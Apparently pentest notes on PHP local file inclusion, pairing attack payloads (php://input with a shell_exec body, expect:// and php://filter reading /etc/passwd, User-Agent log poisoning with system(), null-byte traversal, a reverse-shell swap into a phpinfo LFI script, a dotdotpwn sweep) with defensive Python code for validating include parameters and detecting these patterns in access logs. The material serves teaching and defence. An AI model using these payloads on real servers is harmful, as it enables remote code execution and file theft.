LFI

Iterate over paths.txt (a list of common config file paths) and check which of them are accessible through the include

# Read paths.txt line by line (the || [ -n "$p" ] keeps a last line that has no trailing newline)
while IFS="" read -r p || [ -n "$p" ]
do
  printf '%s\n' "$p"                                   # echo the path being tried
  curl 'http://dev.team.thm/script.php?page='"$p"      # request it through the include parameter
done < paths.txt

PHP Wrappers

PHP Expect Wrapper

php?page=expect://ls

PHP Wrapper php://input

example1.php?page=php://input&cmd=ls

Then send a POST request with the following in the body:

<?php echo shell_exec($_GET['cmd']);?>

PHP php://filter

vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

?page=php://filter/resource=/etc/passwd
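The application-side fix for everything in the PHP Wrappers section is to validate the page parameter before it ever reaches include(). The following is an added example, written in Python for this page rather than taken from any project or from the notes above; PAGES_DIR, PAGE_EXT, the function name classify_page_param and the optional allowlist are all assumptions for the example. The same four layers (null-byte check, scheme rejection, realpath containment, allowlist) map directly onto PHP's strpos(), realpath() and in_array().

```python
import os
import re
from urllib.parse import unquote

# Assumed deployment values for this example: the only directory that should
# ever be included from, and the extension appended to the page name.
PAGES_DIR = "/var/www/app/pages"
PAGE_EXT = ".php"

# Anything that starts with a scheme (php://, expect://, data:, phar://, ...)
# must never reach include(); this rejects every wrapper listed above.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def classify_page_param(raw_value, pages_dir=PAGES_DIR, allowed=None):
    """Validate a ?page= value before it is handed to include().

    Returns (verdict, resolved_path). verdict is "ok" or the reason for rejection.
    raw_value is the URL-encoded query value and is decoded exactly once here;
    if the web framework has already decoded it, skip the unquote() so the value
    is not double-decoded.
    """
    value = unquote(raw_value)

    # 1. Null byte: older PHP truncated the path at \0, so "x%00" dropped the suffix.
    if "\x00" in value:
        return "null-byte", None

    # 2. Stream wrappers: php://filter, php://input, expect://, and friends.
    if SCHEME_RE.match(value):
        return "wrapper-scheme", None

    # 3. Containment: resolve the path and require it to stay inside pages_dir.
    #    os.path.join() discards pages_dir when value is absolute ("/etc/passwd"),
    #    which is exactly why the realpath comparison below cannot be skipped.
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, value + PAGE_EXT))
    if os.path.commonpath([base, candidate]) != base:
        return "outside-base-dir", None

    # 4. Allowlist (strongest layer): only names the application actually serves.
    if allowed is not None and value not in allowed:
        return "not-in-allowlist", None

    return "ok", candidate


if __name__ == "__main__":
    # Constructed inputs taken from the patterns in these notes.
    for sample in ("home", "../../../etc/passwd", "../../../etc/passwd%00",
                   "php://filter/convert.base64-encode/resource=/etc/passwd",
                   "expect://ls", "/etc/passwd"):
        print(f"{sample!r:62} -> {classify_page_param(sample)[0]}")
```

The containment check is the one that catches absolute paths and traversal; the allowlist is the layer that makes the others redundant, so use it whenever the set of pages is known in advance.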

Apache Log Poisoning through LFI

Check whether the access.log file can be read through the include:

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log

Change the User-Agent header to this:

<?php system($_GET['cmd']); ?>

Apache writes the User-Agent into access.log; when the log is included again, PHP executes the injected code and the command output appears in the response

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&cmd=whoami

Null Byte

http://ex.com/index.php?page=../../../etc/passwd%00

Only works on PHP before 5.3.4, which truncated file paths at the null byte; later versions reject paths containing %00.

phpinfo LFI

Find the script (phpinfolfi.py) in the PayloadsAllTheThings git repository under File Inclusion - Path Traversal

Replace the payload in the script with the payload from php-reverse-shell.php

locate php-reverse
/usr/share/laudanum/php/php-reverse-shell.php

Edit the IP address and the port in the reverse shell

Check the LFIREQ variable.

Run the script and listen for the connection

dotdotpwn automation tool (-m module, -h target host, -o target OS)

dotdotpwn -m http -h IP -o windows
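From the detection side, every technique in these notes leaves a distinctive trace in the web server's access log: wrapper schemes and traversal sequences in the query string, a %00 in the path, the log file's own path being requested, a PHP tag in the User-Agent (the log-poisoning precondition), and a burst of traversal variants from one client (the dotdotpwn sweep). The following is an added example, not code from the notes or from any tool; the log lines are constructed for the example, and the indicator names, the analyze_log function and the burst_threshold default are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache "combined" format lines, not real traffic: one benign request,
# the wrapper and log-poisoning patterns from these notes, a null-byte traversal,
# and a short traversal sweep from a single client.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /vuln.php?page=php://filter/convert.base64-encode/resource=/etc/passwd HTTP/1.1" 200 2048 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /lfi.php?file=/var/log/apache2/access.log HTTP/1.1" 200 9000 "-" "<?php system($_GET['cmd']); ?>"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=../../../etc/passwd%00 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.11 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=../etc/passwd HTTP/1.1" 404 300 "-" "Mozilla/5.0"
10.0.0.11 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=../../etc/passwd HTTP/1.1" 404 300 "-" "Mozilla/5.0"
10.0.0.11 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.11 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 300 "-" "Mozilla/5.0"
"""

# Apache combined log format. A User-Agent containing a literal double quote would
# not match; a real pipeline should count such unparsable lines rather than drop them.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators applied to the URL-decoded request path and query string.
URL_INDICATORS = [
    ("php-wrapper", re.compile(r"\b(?:php|expect|file|phar|zip|data)://", re.IGNORECASE)),
    ("path-traversal", re.compile(r"\.\.[/\\]")),      # ../ and ..\ after decoding
    ("null-byte", re.compile(r"\x00")),                 # %00 becomes \x00 after unquote()
    ("log-file-include", re.compile(r"/var/log/", re.IGNORECASE)),
]
# Indicator applied to the User-Agent header: a PHP tag there is the log-poisoning step.
UA_PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)


def analyze_log(text, burst_threshold=3):
    """Scan Apache access-log text for LFI indicators.

    Returns (alerts, scanners): alerts is a list of (client_ip, indicator, raw_url)
    tuples; scanners lists client IPs with at least burst_threshold traversal
    requests, the footprint of an automated sweep such as dotdotpwn.
    """
    alerts = []
    traversal_hits = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, raw_url, ua = m["ip"], m["url"], m["ua"]
        url = unquote(raw_url)  # decode once so %2e%2e, %5c and %00 become visible
        for name, pattern in URL_INDICATORS:
            if pattern.search(url):
                alerts.append((ip, name, raw_url))
                if name == "path-traversal":
                    traversal_hits[ip] += 1
        if UA_PHP_TAG_RE.search(ua):
            alerts.append((ip, "php-tag-in-user-agent", raw_url))
    scanners = sorted(ip for ip, n in traversal_hits.items() if n >= burst_threshold)
    return alerts, scanners


if __name__ == "__main__":
    found, sweeps = analyze_log(SAMPLE_LOG)
    for ip, name, url in found:
        print(f"{ip:10} {name:22} {url}")
    print("traversal sweeps from:", sweeps)
```

Match on the decoded URL, not the raw one, or the %2f and %5c variants in the sweep go unnoticed; and treat a PHP tag in any logged header as high severity on its own, because the log file only becomes dangerous once it is readable through the include.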